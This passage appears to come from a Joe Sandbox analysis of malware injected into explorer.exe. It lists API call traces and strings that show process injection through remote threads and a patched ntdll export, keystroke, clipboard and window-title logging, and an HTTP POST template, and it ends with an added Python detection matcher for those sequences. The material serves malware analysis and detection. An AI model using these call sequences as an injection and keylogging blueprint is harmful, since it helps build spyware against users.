                                                        • Instruction Fuzzy Hash: 6F41A1302047019BD714BF649C959BE77EDFF84B50F000628B9D6972E2EF389E068B62

                                                        Control-flow Graph

                                                        (Control-flow graph rendering omitted; basic blocks 00089AE0–00089CAD, with calls to LoadLibraryA, GetProcAddress and VirtualProtect (twice) in the 00089BFA–00089CA0 range.)
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_88000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                        • Instruction ID: 0d37eedbe500ee790c8412a6b65a8675b6b3dcc5f5d5e4945e36827d966a7865
                                                        • Opcode Fuzzy Hash: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                        • Instruction Fuzzy Hash: 495124B1A446524AD721BA78DD807B5BBE4FB52334B2C0739C5E6CB3C6E7A45806C7A0

                                                        Control-flow Graph

                                                        (Control-flow graph rendering omitted; basic blocks 0008276D–00082798: OpenFileMappingA, then MapViewOfFile only when the mapping was opened.)
                                                        APIs
                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                        • Instruction ID: b6b55214a3d7b72dd5065cc7f6cf5cc5cfe51089837142714a1d2e3023f5fcf5
                                                        • Opcode Fuzzy Hash: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                        • Instruction Fuzzy Hash: 23D01732715231BBE3745A7B6C0CF83AEDDEFC6AE1B010025B94DD2190D6648810C7F0

                                                        Control-flow Graph

                                                        (Control-flow graph rendering omitted; basic blocks 0008275A–0008276C: UnmapViewOfFile, CloseHandle.)
                                                        APIs
                                                        • UnmapViewOfFile.KERNEL32(00000000,?,0008129A,00000001), ref: 0008275E
                                                        • CloseHandle.KERNELBASE(?), ref: 00082765
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseFileHandleUnmapView
                                                        • String ID:
                                                        • API String ID: 2381555830-0
                                                        • Opcode ID: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                        • Instruction ID: e78c18ebb3f3fe14dbe1de984ec7bdf689ac5a628f3d417fc22d0e2a98b1dd89
                                                        • Opcode Fuzzy Hash: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                        • Instruction Fuzzy Hash: 7AB0123241503097E32427347C1C9DB3E18FFC96213050144F54D810104B2C0A018FE8

                                                        Control-flow Graph

                                                        (Control-flow graph rendering omitted; basic blocks 00082A09–00082A19: GetProcessHeap, RtlAllocateHeap.)
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                        • Instruction ID: 854f13ea7621927148a9a8b2bf7c264aaceb780fcb2716b8a169ac4b90289c09
                                                        • Opcode Fuzzy Hash: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                        • Instruction Fuzzy Hash: 0CA002B16501006BFD4457E4DD1DF157658B7C4F01F4045447286C50509D7955449F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0008192F
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000819BF
                                                        • RtlMoveMemory.NTDLL(00000000,00083638,00000016), ref: 000819E6
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081A0E
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081A1E
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081A38
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00081A40
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A4E
                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A55
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00081A6B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A72
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081ACC
                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081AD3
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081B0B
                                                        • CloseHandle.KERNEL32(?), ref: 00081B11
                                                        • CloseHandle.KERNEL32(?), ref: 00081B17
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081B1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-2737717697
                                                        • Opcode ID: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                        • Instruction ID: 174d13c8333c33db2c366c6690c673af472261b50b6cc6d7832f0528390f2b82
                                                        • Opcode Fuzzy Hash: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                        • Instruction Fuzzy Hash: D6614B71204205AFE710EF65DC94EABBBECFF88B54F000519F98997291DB74DE058BA2

                                                        Control-flow Graph

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000827B5
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000827CD
                                                        • lstrlen.KERNEL32(?,00000000), ref: 000827D5
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000827E0
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000827FA
                                                        • wsprintfA.USER32 ref: 00082811
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0008282A
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00082834
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                        • Instruction ID: 7af9abcfa44f8fdb20a1014f3b0a0b848b8d4329f526ecb6ba9fbd9c9bd4efaa
                                                        • Opcode Fuzzy Hash: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                        • Instruction Fuzzy Hash: A3112B71900108BFEB119B95EC98EEEBFBCFB88B11F104065FA45E2150DA754F459B60
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00081652
                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: KeyboardStateUnicode
                                                        • String ID:
                                                        • API String ID: 3453085656-3916222277
                                                        • Opcode ID: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                        • Instruction ID: 29f38b6ab814598dd83ed5aba00077f139db2babf61fac0e1786dbac03cf2fdc
                                                        • Opcode Fuzzy Hash: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                        • Instruction Fuzzy Hash: 1B0184329006299BEB34EB54DD45BFB73FCBF45B10F08441AE9C1E2151E734D9568BA1

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlZeroMemory.NTDLL(00085013,0000001C), ref: 000813C8
                                                        • VirtualQuery.KERNEL32(000813AE,?,0000001C), ref: 000813DA
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0008140B
                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 0008141C
                                                        • wsprintfA.USER32 ref: 00081433
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081448
                                                        • GetLastError.KERNEL32 ref: 0008144E
                                                        • RtlInitializeCriticalSection.NTDLL(0008582C), ref: 00081465
                                                        • Sleep.KERNEL32(000001F4), ref: 00081489
                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000814A6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000814AF
                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000814D0
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000814D3
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000814F1
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0008150D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081514
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0008152A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                        • API String ID: 3628807430-1779906909
                                                        • Opcode ID: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                        • Instruction ID: 735b7a70de4e956d7122513613398751e416d658d32f83b3185d311b43a817db
                                                        • Opcode Fuzzy Hash: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                        • Instruction Fuzzy Hash: 7E41B570640B04EBE710BF65EC19E9F3FACFF84B51B004029F6C59A292DB7999018FA1
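                                                        The API blocks above document the behaviours a detection engineer would want to match on: the routine at 000818BF opens the target with 0x001FFFFF (PROCESS_ALL_ACCESS), calls NtSetInformationProcess with information class 0x34 (ProcessMitigationPolicy in the PROCESSINFOCLASS numbering), resolves ntdll!atan, reads and overwrites 5 bytes there, starts a remote thread, then writes the 5 bytes back; the Toolhelp walk compares image names against explorer.exe and microsoftedgecp.exe; and the GetKeyboardState/ToUnicode and GetForegroundWindow/GetWindowTextW routines log keystrokes and window titles. The following is an added example, not part of the Joe Sandbox report and not SmokeLoader code: a parser for the report's "API.MODULE(args), ref: ADDR" lines plus an ordered, gap-tolerant matcher over the resulting call sequence. The rule names, the block labels and the abridged argument lists in the sample are my own; the 5-byte size check encodes the analytic assumption, which the report shows but does not state, that the read/write/thread/write pair is a patch-run-restore of the resolved export (5 bytes is one x86 E9 rel32 jump).

```python
import re
from collections import namedtuple
from typing import Callable, Dict, List, Optional

# Added example, not Joe Sandbox or SmokeLoader code: parse the report's
# "API.MODULE(args), ref: ADDR" lines and flag the behaviours they document.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

Call = namedtuple("Call", "api module args ref subcall")  # subcall: a "Part of subcall" line

def parse_block(text: str) -> List[Call]:
    """Turn one 'APIs' section of the report into an ordered call list."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:  # headings such as "Strings" simply do not match
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            calls.append(Call(m.group("api"), m.group("mod").upper(), args,
                              int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

def arg_hex(call: Call, index: int) -> Optional[int]:
    """Argument `index` as an int, or None when it is '?' or absent."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None

def api(name: str, size: Optional[int] = None) -> Callable[[Call], bool]:
    """Direct (non-subcall) call to `name`; with `size`, the 4th argument (nSize) must match."""
    return lambda c: (c.api == name and not c.subcall
                      and (size is None or arg_hex(c, 3) == size))

def match_sequence(calls: List[Call], steps: List[Callable[[Call], bool]]) -> Optional[List[int]]:
    """Ordered, gap-tolerant subsequence match; returns the matched refs or None."""
    refs, pos = [], 0
    for step in steps:
        while pos < len(calls) and not step(calls[pos]):
            pos += 1
        if pos == len(calls):
            return None
        refs.append(calls[pos].ref)
        pos += 1
    return refs

# Rule names are my own labels.  Assumption in the second rule: read/write/thread/
# write of 5 bytes at a resolved export is a patch-run-restore (x86 E9 rel32 jump).
RULES: Dict[str, list] = {
    "remote_thread_injection": [api("OpenProcess"), api("WriteProcessMemory"),
                                api("CreateRemoteThread")],
    "export_patch_and_restore": [api("GetProcAddress"), api("ReadProcessMemory", 5),
                                 api("WriteProcessMemory", 5), api("CreateRemoteThread"),
                                 api("WriteProcessMemory", 5)],
    "process_walk_by_name": [api("CreateToolhelp32Snapshot"), api("Process32First"),
                             api("lstrcmpi"), api("Process32Next")],
    "keystroke_capture": [api("GetKeyboardState"), api("ToUnicode")],
    "foreground_window_logging": [api("GetForegroundWindow"), api("GetWindowTextW")],
}

def process_targets(calls: List[Call]) -> List[str]:
    """Image names the walk compares against (second argument of lstrcmpi)."""
    return [c.args[1] for c in calls if c.api == "lstrcmpi" and len(c.args) > 1
            and c.args[1].lower().endswith(".exe")]

def scan(blocks: Dict[str, str]) -> Dict[str, Dict[str, List[int]]]:
    """Map each function block to the rules it triggers and the refs that matched."""
    report = {}
    for name, text in blocks.items():
        calls = parse_block(text)
        hits = {r: m for r, s in RULES.items() if (m := match_sequence(calls, s)) is not None}
        if hits:
            report[name] = hits
    return report

# Sample input: lines copied (argument lists abridged) from the report blocks above.
SAMPLE_BLOCKS = {
    "Function_000810A5": """
• Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
• Process32First.KERNEL32(00000000,?), ref: 0008117F
• lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
• lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
• Process32Next.KERNEL32(00000000,00000128), ref: 0008126C""",
    "Function_000818BF": """
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
• GetModuleHandleA.KERNEL32(ntdll,atan,?), ref: 00081A6B
• GetProcAddress.KERNEL32(00000000,?), ref: 00081A72
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE""",
    "Function_0008162B": """
• GetKeyboardState.USER32(?), ref: 00081652
• ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A""",
    "Function_000816B9": """
• GetForegroundWindow.USER32 ref: 0008174E
• GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767""",
}

if __name__ == "__main__":
    print(scan(SAMPLE_BLOCKS), process_targets(parse_block(SAMPLE_BLOCKS["Function_000810A5"])))
```

                                                        "Part of subcall function" lines are parsed but excluded from matching, so a callee's heap or VirtualQuery calls, which the report prints at the top of every caller's list, cannot satisfy a rule meant for the caller. The matcher is deliberately gap-tolerant: the report interleaves Sleep, CloseHandle and GetLastError between the calls that matter, and a rule that demanded adjacency would miss the very sequence shown above.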

                                                        Control-flow Graph

                                                        (Control-flow graph rendering omitted; basic blocks 000816B9–000817DB: RtlEnterCriticalSection, lstrlenW twice, call 000829CE, wsprintfW via call 000817DC, GetForegroundWindow, GetWindowTextW, GetClassNameW, then lstrcmpW deciding between lstrcpyW plus wsprintfW for a new window title and lstrcatW for the same one, call 000829EB, RtlLeaveCriticalSection.)
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(0008582C), ref: 000816C4
                                                        • lstrlenW.KERNEL32 ref: 000816DB
                                                        • lstrlenW.KERNEL32 ref: 000816F3
                                                        • wsprintfW.USER32 ref: 00081743
                                                        • GetForegroundWindow.USER32 ref: 0008174E
                                                        • GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767
                                                        • GetClassNameW.USER32(00000000,00085850,00000800), ref: 00081774
                                                        • lstrcmpW.KERNEL32(00085020,00085850), ref: 00081781
                                                        • lstrcpyW.KERNEL32(00085020,00085850), ref: 0008178D
                                                        • wsprintfW.USER32 ref: 000817AD
                                                        • lstrcatW.KERNEL32 ref: 000817C6
                                                        • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000817D3
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                        • API String ID: 2651329914-3371406555
                                                        • Opcode ID: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                        • Instruction ID: e106a69ff408d8b0d66b3fc31dadf507e352e016c891a9268a5da8e7baf2df89
                                                        • Opcode Fuzzy Hash: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                        • Instruction Fuzzy Hash: CE21B734544A14ABE7217B25FC89EAF3EBCFF81F56B144028F5C196162DE198D028BF5

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks 825f1-8268e; GetCurrentProcessId, GetCurrentThreadId, CreateToolhelp32Snapshot, then a Thread32First/Thread32Next loop that calls OpenThread followed by SuspendThread or ResumeThread and CloseHandle, with a final CloseHandle on the snapshot
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00082603
                                                        • GetCurrentThreadId.KERNEL32 ref: 0008260B
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0008261B
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 00082629
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00082648
                                                        • SuspendThread.KERNEL32(00000000), ref: 00082658
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082667
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00082677
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082682
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                        • Instruction ID: b03dfa3635f73c53ef02778bef4dd97478a1a04b34a9c8620f52957b2d5eb463
                                                        • Opcode Fuzzy Hash: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                        • Instruction Fuzzy Hash: 5D117C31404200EFE711AF60AC5CB6EBEA4FF84B05F000529FAC692150E7388A199FA3

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks 820a1-8240c; calls RtlZeroMemory, wsprintfW (twice), RtlMoveMemory and internal functions 8240f, 82a09, 8298a, 824cc, 8243d, 8288d, 829bd, 829ce, 829eb
                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                          • Part of subcall function 0008298A: lstrlen.KERNEL32(00084FE2,?,00000000,00000000,000820DD,75712B62,00084FE2,00000000), ref: 00082992
                                                          • Part of subcall function 0008298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00084FE2,00000001,00000000,00000000), ref: 000829A4
                                                          • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00082139
                                                        • wsprintfW.USER32 ref: 00082272
                                                        • wsprintfW.USER32 ref: 000822DD
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823A7
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                        • Instruction ID: eb393b0eeacd80a5bfa002af34c47191fe6bec282c1bd132379949c4154c94d3
                                                        • Opcode Fuzzy Hash: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                        • Instruction Fuzzy Hash: A7A13A71608345AFD750AF68D888A6BBBE9FFC8B40F14082DF5C5D7252DA78DA048B52

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks 812ae-813ad; calls lstrlen, RtlZeroMemory, RtlMoveMemory (twice), PathMatchSpecA and internal functions 829bd, 82a09, 82841, 82569, 8255c, 829ae, 829eb
                                                        APIs
                                                          • Part of subcall function 000829BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000812DC
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0008138A
                                                          • Part of subcall function 00082841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00081119,00000001), ref: 00082850
                                                          • Part of subcall function 00082841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00081119,00000001), ref: 00082855
                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00081316
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081332
                                                          • Part of subcall function 00082569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0008136E), ref: 00082591
                                                          • Part of subcall function 00082569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0008259A
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008135F
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                        • String ID:
                                                        • API String ID: 2993730741-0
                                                        • Opcode ID: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                        • Instruction ID: d5e7a5d4c6fba1c9ca2a6b0442937c699363d6c36e7367382e75030dee9f6b60
                                                        • Opcode Fuzzy Hash: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                        • Instruction Fuzzy Hash: 5E219C707042129F8714FF2898558BEB7DEBF84B10B10092EF8D2D3242DB74DE0A8B62

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks 81581-81628; calls GlobalFix, lstrlenW, lstrcatW, GlobalUnWire and internal functions 8293e, 82724, 82a09, 816b9, 829eb
                                                        APIs
                                                        • GlobalFix.KERNEL32(00000000), ref: 000815A9
                                                        • lstrlenW.KERNEL32(00000000), ref: 000815C6
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 000815DC
                                                        • lstrlenW.KERNEL32(00000000), ref: 00081600
                                                        • GlobalUnWire.KERNEL32(00000000), ref: 0008161C
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Globallstrlen$Wirelstrcat
                                                        • String ID:
                                                        • API String ID: 2993198917-0
                                                        • Opcode ID: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                        • Instruction ID: 788b0c73e6fd266604e91dee9fcfd0ea141b5d47a36d9ac5700182ba7bd2db02
                                                        • Opcode Fuzzy Hash: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                        • Instruction Fuzzy Hash: D5010432A005119B96A577B9ACA85FE72EEFFC6B117080125F8C7E3212EE388D034750

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks 81bbd-81cbd; calls RtlMoveMemory, LoadLibraryA, GetProcAddress, LdrProcessRelocationBlock
                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081BF4
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081C1C
                                                        • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081C49
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081C9A
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
